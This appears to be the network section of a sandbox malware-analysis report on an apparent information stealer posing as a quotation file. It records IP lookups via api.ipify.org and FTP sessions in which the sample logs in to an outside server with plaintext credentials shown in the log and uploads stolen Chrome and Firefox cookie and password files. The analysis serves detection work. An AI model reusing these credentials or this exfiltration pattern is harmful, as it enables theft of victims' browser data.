                                      Sep 27, 2024 13:13:53.917536020 CEST6175949785110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:53.917583942 CEST6175949785110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:53.917613983 CEST6175949785110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:53.917659998 CEST6175949785110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:53.917690039 CEST6175949785110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:53.917692900 CEST4978561759192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:53.917742014 CEST6175949785110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:53.922292948 CEST6175949785110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:53.922607899 CEST6175949785110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:53.922638893 CEST6175949785110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:53.922718048 CEST6175949785110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:53.922744989 CEST6175949785110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:53.922780991 CEST6175949785110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:53.922826052 CEST6175949785110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:53.922852039 CEST6175949785110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:53.923075914 CEST6175949785110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:53.923321962 CEST4978561759192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:54.053283930 CEST4973721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:54.731836081 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:54.850157976 CEST4973721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:57.559030056 CEST4978721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:57.564023018 CEST2149787110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:57.566580057 CEST4978721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:57.566694975 CEST4978721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:13:57.571959019 CEST2149787110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:13:57.574671984 CEST4978721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:14:01.758456945 CEST4978821192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:14:01.763614893 CEST2149788110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:01.763712883 CEST4978821192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:14:01.763900042 CEST4978821192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:14:01.769047022 CEST2149788110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:01.769128084 CEST4978821192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:14:02.400526047 CEST4973721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:14:02.469710112 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:02.839585066 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:02.839992046 CEST4978964095192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:14:02.844880104 CEST6409549789110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:02.845016956 CEST4978964095192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:14:02.845113993 CEST4973721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:14:02.849905968 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:03.993027925 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:03.995950937 CEST4978964095192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:14:04.056494951 CEST4973721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:14:04.215801001 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:04.216586113 CEST4973721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:14:04.217263937 CEST6409549789110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:04.217392921 CEST4978964095192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:14:04.217426062 CEST6409549789110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:04.217545033 CEST4978964095192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:14:04.217590094 CEST6409549789110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:04.217675924 CEST4978964095192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:14:04.217912912 CEST6409549789110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:04.218002081 CEST4978964095192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:14:04.218105078 CEST6409549789110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:04.218116999 CEST6409549789110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:04.218149900 CEST4978964095192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:14:04.218199015 CEST4978964095192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:14:04.218225002 CEST6409549789110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:04.218236923 CEST6409549789110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:04.218249083 CEST6409549789110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:04.218260050 CEST6409549789110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:04.218286991 CEST4978964095192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:14:04.218286991 CEST4978964095192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:14:04.222840071 CEST6409549789110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:04.222870111 CEST6409549789110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:04.222897053 CEST6409549789110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:04.222923040 CEST6409549789110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:04.222934961 CEST4978964095192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:14:04.222949982 CEST6409549789110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:04.222966909 CEST4978964095192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:14:04.222976923 CEST6409549789110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:04.222987890 CEST4978964095192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:14:04.222987890 CEST4978964095192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:14:04.223023891 CEST6409549789110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:04.223051071 CEST6409549789110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:04.223067045 CEST4978964095192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:14:04.223083973 CEST4978964095192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:14:04.223117113 CEST6409549789110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:04.223150969 CEST4978964095192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:14:04.223201990 CEST4978964095192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:14:04.227710009 CEST6409549789110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:04.227754116 CEST6409549789110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:04.227781057 CEST6409549789110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:04.227852106 CEST4978964095192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:14:04.227889061 CEST6409549789110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:04.228027105 CEST6409549789110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:04.228117943 CEST6409549789110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:04.232601881 CEST6409549789110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:04.232630968 CEST6409549789110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:04.232656956 CEST6409549789110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:04.232683897 CEST6409549789110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:04.232709885 CEST6409549789110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:04.232873917 CEST6409549789110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:04.233350992 CEST6409549789110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:04.236573935 CEST4978964095192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:14:05.018769026 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:05.240798950 CEST4973721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:14:12.715809107 CEST4979021192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:14:12.720983982 CEST2149790110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:12.721059084 CEST4979021192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:14:12.806090117 CEST4973721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:14:12.811044931 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:12.947923899 CEST4979121192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:14:12.952835083 CEST2149791110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:12.952908039 CEST4979121192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:14:13.186691046 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:13.187110901 CEST4979262089192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:14:13.192140102 CEST6208949792110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:13.192212105 CEST4979262089192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:14:13.192327976 CEST4973721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:14:13.197230101 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:13.666157007 CEST2149790110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:13.666340113 CEST4979021192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:14:13.671287060 CEST2149790110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:13.965307951 CEST2149791110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:13.965465069 CEST4979121192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:14:13.970426083 CEST2149791110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:14.024213076 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:14.024406910 CEST4979262089192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:14:14.032387018 CEST6208949792110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:14.032439947 CEST6208949792110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:14.032458067 CEST4979262089192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:14:14.032468081 CEST6208949792110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:14.032494068 CEST4979262089192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:14:14.032686949 CEST4979262089192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:14:14.032717943 CEST6208949792110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:14.032747030 CEST6208949792110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:14.032774925 CEST4979262089192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:14:14.032797098 CEST4979262089192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:14:14.033559084 CEST6208949792110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:14.033588886 CEST6208949792110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:14.033615112 CEST4979262089192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:14:14.033617020 CEST6208949792110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:14.033646107 CEST6208949792110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:14.033647060 CEST4979262089192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:14:14.033673048 CEST4979262089192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:14:14.033673048 CEST6208949792110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:14.033704042 CEST4979262089192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:14:14.033727884 CEST4979262089192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:14:14.037528992 CEST6208949792110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:14.037556887 CEST6208949792110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:14.037611008 CEST4979262089192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:14:14.037616014 CEST6208949792110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:14.037643909 CEST6208949792110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:14.037683964 CEST4979262089192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:14:14.037698984 CEST4979262089192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:14:14.037728071 CEST6208949792110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:14.037755013 CEST6208949792110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:14.037782907 CEST4979262089192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:14:14.037796974 CEST4979262089192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:14:14.037815094 CEST6208949792110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:14.037846088 CEST6208949792110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:14.037868977 CEST4979262089192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:14:14.037899017 CEST4979262089192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:14:14.038686991 CEST6208949792110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:14.038820982 CEST6208949792110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:14.038849115 CEST6208949792110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:14.038875103 CEST6208949792110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:14.038904905 CEST6208949792110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:14.042546988 CEST6208949792110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:14.042752028 CEST6208949792110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:14.042779922 CEST6208949792110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:14.042864084 CEST6208949792110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:14.042890072 CEST6208949792110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:14.042959929 CEST6208949792110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:14.043006897 CEST6208949792110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:14.043034077 CEST6208949792110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:14.043436050 CEST6208949792110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:14.043493986 CEST4979262089192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:14:14.053566933 CEST2149790110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:14.053886890 CEST4979021192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:14:14.058950901 CEST2149790110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:14.068937063 CEST4973721192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:14:14.334882975 CEST2149791110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:14.335005045 CEST4979121192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:14:14.339932919 CEST2149791110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:14.443470001 CEST2149790110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:14.443749905 CEST4979021192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:14:14.448733091 CEST2149790110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:14.713192940 CEST2149791110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:14.756432056 CEST4979121192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:14:14.776681900 CEST2149790110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:14.818948030 CEST4979021192.168.2.4110.4.45.197
                                      Sep 27, 2024 13:14:14.831434011 CEST2149737110.4.45.197192.168.2.4
                                      Sep 27, 2024 13:14:14.881442070 CEST4973721192.168.2.4110.4.45.197

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Sep 27, 2024 13:10:02.280484915 CEST6298453192.168.2.41.1.1.1
                                      Sep 27, 2024 13:10:02.308217049 CEST53629841.1.1.1192.168.2.4
                                      Sep 27, 2024 13:10:06.803459883 CEST6128453192.168.2.41.1.1.1
                                      Sep 27, 2024 13:10:07.075886011 CEST53612841.1.1.1192.168.2.4

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Sep 27, 2024 13:10:02.280484915 CEST192.168.2.41.1.1.10xafb2Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                      Sep 27, 2024 13:10:06.803459883 CEST192.168.2.41.1.1.10xd8abStandard query (0)ftp.haliza.com.myA (IP address)IN (0x0001)false

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Sep 27, 2024 13:10:02.308217049 CEST1.1.1.1192.168.2.40xafb2No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                      Sep 27, 2024 13:10:02.308217049 CEST1.1.1.1192.168.2.40xafb2No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                      Sep 27, 2024 13:10:02.308217049 CEST1.1.1.1192.168.2.40xafb2No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                      Sep 27, 2024 13:10:07.075886011 CEST1.1.1.1192.168.2.40xd8abNo error (0)ftp.haliza.com.my110.4.45.197A (IP address)IN (0x0001)false

                                      HTTP Request Dependency Graph

                                      • api.ipify.org

                                      HTTPS Proxied Packets

                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.449733104.26.12.2054432756C:\Users\user\Desktop\rQuotation3200025006.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-27 11:10:03 UTC155OUTGET / HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                      Host: api.ipify.org
                                      Connection: Keep-Alive
                                      2024-09-27 11:10:03 UTC211INHTTP/1.1 200 OK
                                      Date: Fri, 27 Sep 2024 11:10:03 GMT
                                      Content-Type: text/plain
                                      Content-Length: 11
                                      Connection: close
                                      Vary: Origin
                                      CF-Cache-Status: DYNAMIC
                                      Server: cloudflare
                                      CF-RAY: 8c9b0b8a0a530f69-EWR
                                      2024-09-27 11:10:03 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                      Data Ascii: 8.46.123.33


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      1192.168.2.449740104.26.12.2054437616C:\Users\user\AppData\Roaming\pBBqGOzrz.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-27 11:10:13 UTC155OUTGET / HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                      Host: api.ipify.org
                                      Connection: Keep-Alive
                                      2024-09-27 11:10:13 UTC211INHTTP/1.1 200 OK
                                      Date: Fri, 27 Sep 2024 11:10:13 GMT
                                      Content-Type: text/plain
                                      Content-Length: 11
                                      Connection: close
                                      Vary: Origin
                                      CF-Cache-Status: DYNAMIC
                                      Server: cloudflare
                                      CF-RAY: 8c9b0bc51fd70f63-EWR
                                      2024-09-27 11:10:13 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                      Data Ascii: 8.46.123.33


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      2192.168.2.449748104.26.12.2054438012C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-27 11:10:20 UTC155OUTGET / HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                      Host: api.ipify.org
                                      Connection: Keep-Alive
                                      2024-09-27 11:10:21 UTC211INHTTP/1.1 200 OK
                                      Date: Fri, 27 Sep 2024 11:10:20 GMT
                                      Content-Type: text/plain
                                      Content-Length: 11
                                      Connection: close
                                      Vary: Origin
                                      CF-Cache-Status: DYNAMIC
                                      Server: cloudflare
                                      CF-RAY: 8c9b0bf08c9943ed-EWR
                                      2024-09-27 11:10:21 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                      Data Ascii: 8.46.123.33


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      3192.168.2.449755104.26.12.2054437188C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-27 11:10:27 UTC155OUTGET / HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                      Host: api.ipify.org
                                      Connection: Keep-Alive
                                      2024-09-27 11:10:27 UTC211INHTTP/1.1 200 OK
                                      Date: Fri, 27 Sep 2024 11:10:27 GMT
                                      Content-Type: text/plain
                                      Content-Length: 11
                                      Connection: close
                                      Vary: Origin
                                      CF-Cache-Status: DYNAMIC
                                      Server: cloudflare
                                      CF-RAY: 8c9b0c1d38730f78-EWR
                                      2024-09-27 11:10:27 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                      Data Ascii: 8.46.123.33


                                      FTP Packets

                                      TimestampSource PortDest PortSource IPDest IPCommands
                                      Sep 27, 2024 13:10:08.907953024 CEST2149737110.4.45.197192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 50 allowed.
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 50 allowed.220-Local time is now 19:10. Server port: 21.
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 50 allowed.220-Local time is now 19:10. Server port: 21.220-This is a private system - No anonymous login
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 50 allowed.220-Local time is now 19:10. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 50 allowed.220-Local time is now 19:10. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                      Sep 27, 2024 13:10:08.908003092 CEST2149737110.4.45.197192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 50 allowed.
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 50 allowed.220-Local time is now 19:10. Server port: 21.
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 50 allowed.220-Local time is now 19:10. Server port: 21.220-This is a private system - No anonymous login
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 50 allowed.220-Local time is now 19:10. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 50 allowed.220-Local time is now 19:10. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                      Sep 27, 2024 13:10:08.908032894 CEST2149737110.4.45.197192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 50 allowed.
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 50 allowed.220-Local time is now 19:10. Server port: 21.
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 50 allowed.220-Local time is now 19:10. Server port: 21.220-This is a private system - No anonymous login
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 50 allowed.220-Local time is now 19:10. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 50 allowed.220-Local time is now 19:10. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                      Sep 27, 2024 13:10:08.908216000 CEST4973721192.168.2.4110.4.45.197USER origin@haliza.com.my
                                      Sep 27, 2024 13:10:09.235133886 CEST2149737110.4.45.197192.168.2.4331 User origin@haliza.com.my OK. Password required
                                      Sep 27, 2024 13:10:09.235284090 CEST4973721192.168.2.4110.4.45.197PASS JesusChrist007$
                                      Sep 27, 2024 13:10:09.609087944 CEST2149737110.4.45.197192.168.2.4230 OK. Current restricted directory is /
                                      Sep 27, 2024 13:10:09.939069033 CEST2149737110.4.45.197192.168.2.4504 Unknown command
                                      Sep 27, 2024 13:10:09.942521095 CEST4973721192.168.2.4110.4.45.197PWD
                                      Sep 27, 2024 13:10:10.269857883 CEST2149737110.4.45.197192.168.2.4257 "/" is your current location
                                      Sep 27, 2024 13:10:10.270051003 CEST4973721192.168.2.4110.4.45.197TYPE I
                                      Sep 27, 2024 13:10:10.596981049 CEST2149737110.4.45.197192.168.2.4200 TYPE is now 8-bit binary
                                      Sep 27, 2024 13:10:10.599124908 CEST4973721192.168.2.4110.4.45.197PASV
                                      Sep 27, 2024 13:10:10.925662041 CEST2149737110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,209,190)
                                      Sep 27, 2024 13:10:10.933353901 CEST4973721192.168.2.4110.4.45.197STOR CO_Chrome_Default.txt_user-849224_2024_09_27_08_10_04.txt
                                      Sep 27, 2024 13:10:11.762018919 CEST2149737110.4.45.197192.168.2.4150 Accepted data connection
                                      Sep 27, 2024 13:10:12.151508093 CEST2149737110.4.45.197192.168.2.4226-File successfully transferred
                                      226-File successfully transferred226 0.389 seconds (measured here), 8.42 Kbytes per second
                                      Sep 27, 2024 13:10:12.152465105 CEST4973721192.168.2.4110.4.45.197PASV
                                      Sep 27, 2024 13:10:12.479223013 CEST2149737110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,210,26)
                                      Sep 27, 2024 13:10:12.484707117 CEST4973721192.168.2.4110.4.45.197STOR CO_Firefox_fqs92o4p.default-release.txt_user-849224_2024_09_27_14_38_12.txt
                                      Sep 27, 2024 13:10:13.321419954 CEST2149737110.4.45.197192.168.2.4150 Accepted data connection
                                      Sep 27, 2024 13:10:13.884481907 CEST2149737110.4.45.197192.168.2.4226 File successfully transferred
                                      Sep 27, 2024 13:10:13.885103941 CEST2149737110.4.45.197192.168.2.4226 File successfully transferred
                                      Sep 27, 2024 13:10:15.600683928 CEST2149741110.4.45.197192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed.
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed.220-Local time is now 19:10. Server port: 21.
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed.220-Local time is now 19:10. Server port: 21.220-This is a private system - No anonymous login
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed.220-Local time is now 19:10. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed.220-Local time is now 19:10. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                      Sep 27, 2024 13:10:15.600987911 CEST4974121192.168.2.4110.4.45.197USER origin@haliza.com.my
                                      Sep 27, 2024 13:10:15.931091070 CEST2149741110.4.45.197192.168.2.4331 User origin@haliza.com.my OK. Password required
                                      Sep 27, 2024 13:10:15.935343027 CEST4974121192.168.2.4110.4.45.197PASS JesusChrist007$
                                      Sep 27, 2024 13:10:16.301481962 CEST2149741110.4.45.197192.168.2.4230 OK. Current restricted directory is /
                                      Sep 27, 2024 13:10:16.631720066 CEST2149741110.4.45.197192.168.2.4504 Unknown command
                                      Sep 27, 2024 13:10:16.631902933 CEST4974121192.168.2.4110.4.45.197PWD
                                      Sep 27, 2024 13:10:16.961774111 CEST2149741110.4.45.197192.168.2.4257 "/" is your current location
                                      Sep 27, 2024 13:10:17.045949936 CEST4974121192.168.2.4110.4.45.197TYPE I
                                      Sep 27, 2024 13:10:17.376188993 CEST2149741110.4.45.197192.168.2.4200 TYPE is now 8-bit binary
                                      Sep 27, 2024 13:10:17.382038116 CEST4974121192.168.2.4110.4.45.197PASV
                                      Sep 27, 2024 13:10:17.711987972 CEST2149741110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,208,86)
                                      Sep 27, 2024 13:10:17.718048096 CEST4974121192.168.2.4110.4.45.197STOR PW_user-849224_2024_09_27_07_10_13.html
                                      Sep 27, 2024 13:10:19.570696115 CEST2149741110.4.45.197192.168.2.4150 Accepted data connection
